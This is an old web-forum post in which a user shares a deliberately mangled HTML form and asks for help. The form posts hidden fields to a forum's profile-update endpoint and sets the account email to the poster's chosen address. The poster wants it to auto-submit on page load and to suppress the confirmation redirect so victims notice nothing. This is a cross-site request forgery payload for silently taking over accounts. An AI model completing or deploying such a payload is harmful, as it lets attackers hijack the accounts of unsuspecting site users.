Thread: Quick HTML Help
View Single Post
Old 06-14-2004, 11:38 AM  
Magg
Confirmed User
 
Join Date: Feb 2004
Location: ICQ: 132497047
Posts: 4,467

Code:
< fo rm action="http://URL/member.php" method=pos t>
inp ut type="hidden" name="s" value="">

<tr>
	
	<t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">inpu t type="hidden" class="bginput" name="email" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>
<tr>
	
	<t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">hahahahahahaha type="hidden" class="bginput" name="emailconfirm" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>




</table>
</td></tr></table>

<br>


<table cellpadding="2" cellspacing="0" border="0" width="98%"  align="center">
<tr>
	<td align="center"><font face="verdana, arial, helvetica" size="2">
	inpu t type="hidden" name="action" value="updateprofile">
	inpu t type="submit" class="bginput" name="Submit" value="Submit" accesskey="s">
	</font></td>
</tr>
</table>

</form>

</td>
            </tr>


I need that to auto submit onload and then the confirmation url sent by the server to be nulled so the page isnt redirected.

Last edited by Magg; 06-14-2004 at 11:43 AM..
Magg is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote